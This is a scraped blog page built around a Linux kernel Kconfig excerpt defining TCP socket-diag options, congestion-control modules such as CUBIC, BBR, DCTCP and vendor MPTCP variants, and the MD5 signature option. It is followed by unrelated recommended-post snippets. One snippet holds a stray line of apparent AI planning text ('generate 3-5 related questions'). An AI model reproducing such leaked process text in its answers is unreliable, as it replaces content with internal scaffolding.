currently downloadable at: http://www.linuxfoundation.org/collaborate/workgroups/networking/iproute2 If unsure, say Y. config INET_TCP_DIAG depends on INET_DIAG def_tristate INET_DIAG config INET_UDP_DIAG tristate "UDP: socket monitoring interface" depends on INET_DIAG && (IPV6 || IPV6=n) default n ---help--- Support for UDP socket monitoring interface used by the ss tool. If unsure, say Y. config INET_RAW_DIAG tristate "RAW: socket monitoring interface" depends on INET_DIAG && (IPV6 || IPV6=n) default n ---help--- Support for RAW socket monitoring interface used by the ss tool. If unsure, say Y. config INET_DIAG_DESTROY bool "INET: allow privileged process to administratively close sockets" depends on INET_DIAG default n ---help--- Provides a SOCK_DESTROY operation that allows privileged processes (e.g., a connection manager or a network administration tool such as ss) to close sockets opened by other processes. Closing a socket in this way interrupts any blocking read/write/connect operations on the socket and causes future socket calls to behave as if the socket had been disconnected. If unsure, say N. menuconfig TCP_CONG_ADVANCED bool "TCP: advanced congestion control" ---help--- Support for selection of various TCP congestion control modules. Nearly all users can safely say no here, and a safe default selection will be made (CUBIC with new Reno as a fallback). If unsure, say N. if TCP_CONG_ADVANCED config TCP_CONG_BIC tristate "Binary Increase Congestion (BIC) control" default m ---help--- BIC-TCP is a sender-side only change that ensures a linear RTT fairness under large windows while offering both scalability and bounded TCP-friendliness. The protocol combines two schemes called additive increase and binary search increase. When the congestion window is large, additive increase with a large increment ensures linear RTT fairness as well as good scalability. Under small congestion windows, binary search increase provides TCP friendliness. See http://www.csc.ncsu.edu/faculty/rhee/export/bitcp/ config TCP_CONG_CUBIC tristate "CUBIC TCP" default y ---help--- This is version 2.0 of BIC-TCP which uses a cubic growth function among other techniques. See http://www.csc.ncsu.edu/faculty/rhee/export/bitcp/cubic-paper.pdf config TCP_CONG_WESTWOOD tristate "TCP Westwood+" default m ---help--- TCP Westwood+ is a sender-side only modification of the TCP Reno protocol stack that optimizes the performance of TCP congestion control. It is based on end-to-end bandwidth estimation to set congestion window and slow start threshold after a congestion episode. Using this estimation, TCP Westwood+ adaptively sets a slow start threshold and a congestion window which takes into account the bandwidth used at the time congestion is experienced. TCP Westwood+ significantly increases fairness wrt TCP Reno in wired networks and throughput over wireless links. config TCP_CONG_HTCP tristate "H-TCP" default m ---help--- H-TCP is a send-side only modifications of the TCP Reno protocol stack that optimizes the performance of TCP congestion control for high speed network links. It uses a modeswitch to change the alpha and beta parameters of TCP Reno based on network conditions and in a way so as to be fair with other Reno and H-TCP flows. config TCP_CONG_HSTCP tristate "High Speed TCP" default n ---help--- Sally Floyd's High Speed TCP (RFC 3649) congestion control. A modification to TCP's congestion control mechanism for use with large congestion windows. A table indicates how much to increase the congestion window by when an ACK is received. For more detail see http://www.icir.org/floyd/hstcp.html config TCP_CONG_HYBLA tristate "TCP-Hybla congestion control algorithm" default n ---help--- TCP-Hybla is a sender-side only change that eliminates penalization of long-RTT, large-bandwidth connections, like when satellite legs are involved, especially when sharing a common bottleneck with normal terrestrial connections. config TCP_CONG_VEGAS tristate "TCP Vegas" default n ---help--- TCP Vegas is a sender-side only change to TCP that anticipates the onset of congestion by estimating the bandwidth. TCP Vegas adjusts the sending rate by modifying the congestion window. TCP Vegas should provide less packet loss, but it is not as aggressive as TCP Reno. config TCP_CONG_NV tristate "TCP NV" default n ---help--- TCP NV is a follow up to TCP Vegas. It has been modified to deal with 10G networks, measurement noise introduced by LRO, GRO and interrupt coalescence. In addition, it will decrease its cwnd multiplicatively instead of linearly. Note that in general congestion avoidance (cwnd decreased when # packets queued grows) cannot coexist with congestion control (cwnd decreased only when there is packet loss) due to fairness issues. One scenario when they can coexist safely is when the CA flows have RTTs << CC flows RTTs. For further details see http://www.brakmo.org/networking/tcp-nv/ config TCP_CONG_SCALABLE tristate "Scalable TCP" default n ---help--- Scalable TCP is a sender-side only change to TCP which uses a MIMD congestion control algorithm which has some nice scaling properties, though is known to have fairness issues. See http://www.deneholme.net/tom/scalable/ config TCP_CONG_LP tristate "TCP Low Priority" default n ---help--- TCP Low Priority (TCP-LP), a distributed algorithm whose goal is to utilize only the excess network bandwidth as compared to the ``fair share`` of bandwidth as targeted by TCP. See http://www-ece.rice.edu/networks/TCP-LP/ config TCP_CONG_VENO tristate "TCP Veno" default n ---help--- TCP Veno is a sender-side only enhancement of TCP to obtain better throughput over wireless networks. TCP Veno makes use of state distinguishing to circumvent the difficult judgment of the packet loss type. TCP Veno cuts down less congestion window in response to random loss packets. See <http://ieeexplore.ieee.org/xpl/freeabs_all.jsp?arnumber=1177186> config TCP_CONG_YEAH tristate "YeAH TCP" select TCP_CONG_VEGAS default n ---help--- YeAH-TCP is a sender-side high-speed enabled TCP congestion control algorithm, which uses a mixed loss/delay approach to compute the congestion window. It's design goals target high efficiency, internal, RTT and Reno fairness, resilience to link loss while keeping network elements load as low as possible. For further details look here: http://wil.cs.caltech.edu/pfldnet2007/paper/YeAH_TCP.pdf config TCP_CONG_ILLINOIS tristate "TCP Illinois" default n ---help--- TCP-Illinois is a sender-side modification of TCP Reno for high speed long delay links. It uses round-trip-time to adjust the alpha and beta parameters to achieve a higher average throughput and maintain fairness. For further details see: http://www.ews.uiuc.edu/~shaoliu/tcpillinois/index.html config TCP_CONG_DCTCP tristate "DataCenter TCP (DCTCP)" default n ---help--- DCTCP leverages Explicit Congestion Notification (ECN) in the network to provide multi-bit feedback to the end hosts. It is designed to provide: - High burst tolerance (incast due to partition/aggregate), - Low latency (short flows, queries), - High throughput (continuous data updates, large file transfers) with commodity, shallow-buffered switches. All switches in the data center network running DCTCP must support ECN marking and be configured for marking when reaching defined switch buffer thresholds. The default ECN marking threshold heuristic for DCTCP on switches is 20 packets (30KB) at 1Gbps, and 65 packets (~100KB) at 10Gbps, but might need further careful tweaking. For further details see: http://simula.stanford.edu/~alizade/Site/DCTCP_files/dctcp-final.pdf config TCP_CONG_CDG tristate "CAIA Delay-Gradient (CDG)" default n ---help--- CAIA Delay-Gradient (CDG) is a TCP congestion control that modifies the TCP sender in order to: o Use the delay gradient as a congestion signal. o Back off with an average probability that is independent of the RTT. o Coexist with flows that use loss-based congestion control. o Tolerate packet loss unrelated to congestion. For further details see: D.A. Hayes and G. Armitage. "Revisiting TCP congestion control using delay gradients." In Networking 2011. Preprint: http://goo.gl/No3vdg config TCP_CONG_BBR tristate "BBR TCP" default n ---help--- BBR (Bottleneck Bandwidth and RTT) TCP congestion control aims to maximize network utilization and minimize queues. It builds an explicit model of the the bottleneck delivery rate and path round-trip propagation delay. It tolerates packet loss and delay unrelated to congestion. It can operate over LAN, WAN, cellular, wifi, or cable modem links. It can coexist with flows that use loss-based congestion control, and can operate with shallow buffers, deep buffers, bufferbloat, policers, or AQM schemes that do not provide a delay signal. It requires the fq ("Fair Queue") pacing packet scheduler. #if defined(CONFIG_BCM_KF_MPTCP) && defined(CONFIG_BCM_MPTCP) config TCP_CONG_LIA tristate "MPTCP Linked Increase" depends on MPTCP default n ---help--- MultiPath TCP Linked Increase Congestion Control To enable it, just put 'lia' in tcp_congestion_control config TCP_CONG_OLIA tristate "MPTCP Opportunistic Linked Increase" depends on MPTCP default n ---help--- MultiPath TCP Opportunistic Linked Increase Congestion Control To enable it, just put 'olia' in tcp_congestion_control config TCP_CONG_WVEGAS tristate "MPTCP WVEGAS CONGESTION CONTROL" depends on MPTCP default n ---help--- wVegas congestion control for MPTCP To enable it, just put 'wvegas' in tcp_congestion_control config TCP_CONG_BALIA tristate "MPTCP BALIA CONGESTION CONTROL" depends on MPTCP default n ---help--- Multipath TCP Balanced Linked Adaptation Congestion Control To enable it, just put 'balia' in tcp_congestion_control config TCP_CONG_MCTCPDESYNC tristate "DESYNCHRONIZED MCTCP CONGESTION CONTROL (EXPERIMENTAL)" depends on MPTCP default n ---help--- Desynchronized MultiChannel TCP Congestion Control. This is experimental code that only supports single path and must have set mptcp_ndiffports larger than one. To enable it, just put 'mctcpdesync' in tcp_congestion_control For further details see: http://ieeexplore.ieee.org/abstract/document/6911722/ https://doi.org/10.1016/j.comcom.2015.07.010 #endif choice prompt "Default TCP congestion control" default DEFAULT_CUBIC help Select the TCP congestion control that will be used by default for all connections. config DEFAULT_BIC bool "Bic" if TCP_CONG_BIC=y config DEFAULT_CUBIC bool "Cubic" if TCP_CONG_CUBIC=y config DEFAULT_HTCP bool "Htcp" if TCP_CONG_HTCP=y config DEFAULT_HYBLA bool "Hybla" if TCP_CONG_HYBLA=y config DEFAULT_VEGAS bool "Vegas" if TCP_CONG_VEGAS=y config DEFAULT_VENO bool "Veno" if TCP_CONG_VENO=y config DEFAULT_WESTWOOD bool "Westwood" if TCP_CONG_WESTWOOD=y config DEFAULT_DCTCP bool "DCTCP" if TCP_CONG_DCTCP=y config DEFAULT_CDG bool "CDG" if TCP_CONG_CDG=y config DEFAULT_BBR bool "BBR" if TCP_CONG_BBR=y #if defined(CONFIG_BCM_KF_MPTCP) && defined(CONFIG_BCM_MPTCP) config DEFAULT_LIA bool "Lia" if TCP_CONG_LIA=y config DEFAULT_OLIA bool "Olia" if TCP_CONG_OLIA=y config DEFAULT_WVEGAS bool "Wvegas" if TCP_CONG_WVEGAS=y config DEFAULT_BALIA bool "Balia" if TCP_CONG_BALIA=y config DEFAULT_MCTCPDESYNC bool "Mctcpdesync (EXPERIMENTAL)" if TCP_CONG_MCTCPDESYNC=y #endif config DEFAULT_RENO bool "Reno" endchoice endif config TCP_CONG_CUBIC tristate depends on !TCP_CONG_ADVANCED default y config DEFAULT_TCP_CONG string default "bic" if DEFAULT_BIC default "cubic" if DEFAULT_CUBIC default "htcp" if DEFAULT_HTCP default "hybla" if DEFAULT_HYBLA default "vegas" if DEFAULT_VEGAS default "westwood" if DEFAULT_WESTWOOD default "veno" if DEFAULT_VENO #if defined(CONFIG_BCM_KF_MPTCP) && defined(CONFIG_BCM_MPTCP) default "lia" if DEFAULT_LIA default "olia" if DEFAULT_OLIA default "wvegas" if DEFAULT_WVEGAS default "balia" if DEFAULT_BALIA #endif default "reno" if DEFAULT_RENO default "dctcp" if DEFAULT_DCTCP default "cdg" if DEFAULT_CDG default "bbr" if DEFAULT_BBR default "cubic" config TCP_MD5SIG bool "TCP: MD5 Signature Option support (RFC2385)" select CRYPTO select CRYPTO_MD5 ---help--- RFC2385 specifies a method of giving MD5 protection to TCP sessions. Its main (only?) use is to protect BGP sessions between core routers on the Internet. If unsure, say N.
最新发布
10-29
Then I need to generate 3-5 related questions following the strict format requirements. 在提供的 Kconfig 片段中,**没有直接配置 `tcp_delack_min` 的选项**。`tcp_delack_min` 是 TCP 协议栈中控制延迟确认...
在Node.js版本v12.16.2中,`crypto`模块提供了加密功能的实现接口
BLOG域名:programb.blog.youkuaiyun.com
04-16 1268
模块的具体文档或使用指南,可以访问官方Node.js文档页面并查阅对应版本的内容。通常情况下,在特定版本下,可以通过指定URL参数来查看历史版本的手册。模块提供了加密功能的实现接口。该模块基于OpenSSL库构建,支持多种哈希算法、HMACs、Cipher/Decipher、Signatures以及Diffie-Hellman密钥交换等功能。而当涉及到网络请求的安全验证环节,则可能需要用到HTTPS客户端选项配置。以上程序展示了怎样通过高级加密标准(AES)方法保护敏感信息,并能够安全恢复原始消息内容。
Unity 【Content Size Fitter】- 聊天气泡自动适配Text文本框大小
当代野生程序猿
02-25 6745
通常在展示人物对话的时候文本的长度是不定的,因此会需要动态的调整对话内容文本框的背景图片的大小,这里以如下这种气泡框的对话为例: 实现该需求涉及到的内容包括Content Size Fitter组件的使用、2D Sprite工具包的使用。 Content Size Fitter组件用于Text文本框,如图所示,我们将Horzontal Fit设为Preferred Size,当我们调整Text文本框中的内容时,其大小会自动进行调整。 注意Rect Transform中Pivot轴心点的设置
新唐NUC972 Linux(一):USB烧写linux出厂镜像
小破孩的博客
02-20 3804
USB烧写出厂镜像 文章目录USB烧写出厂镜像前言一、硬件连接二、安装驱动三、烧写linux程序四、运行程序 前言 今天开始进军linux,学了那么久单片机,也摸得七七八八,至少点个灯还是会的。本人之所以买酷客的linux开发板主要是便宜,资料也算齐全,虽然没有原子那么好,不过也够了,找那么多借口,其实就是qiong。今天先从USB烧录官方提供的linux相关程序到芯片开始吧。 一、硬件连接 1、连接电源线 2、RS232转USB,需要安装CH340驱动,用于在电脑串口超级终端中查看调试信息。 3、U
WeChall CTF Writeup(一)
weixin_43211186的博客
02-25 1830
以下题目标题组成: [Score] [Title] [Author] 文章目录0x01 1 Training: Get Sourced by Gizmore0x02 1 Training: Stegano I by Gizmore0x03 1 Training: Crypto - Caesar I by Gizmore0x04 1 Training: WWW-Robots by Gizmore0x05 1 Training: ASCII by Gizmore 0x01 1 Training: Get Sou
C语言每日一练——第126天:佩奇借书问题
Edison's 小宇宙
02-25 2万+
史上最强借书方案问题讲解(代码详解+思路分析+动图演示+特性总结)
CS5261与CS5265功能应用|CS5261替代RTD2171|CS5265替代RTD2172
qq1659747718的博客
02-25 1576
CS5261可以完全替代兼容停产RTD2171,CS5265可以完全替代兼容RTD2172,芯片单价低,整体方案设计简单,整体BOM成本较RTD2171、RTD2172低。
SmallBuffer:类似StringBuilder的字符串包装工具
4. SmallBuffer类(假设):根据给定文件的描述和标签,我们可以推测SmallBuffer类可能是为了在C++环境下提供类似于StringBuilder的功能。它可能包含了以下功能: - 动态调整大小的能力,以适应字符串内容的增长。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值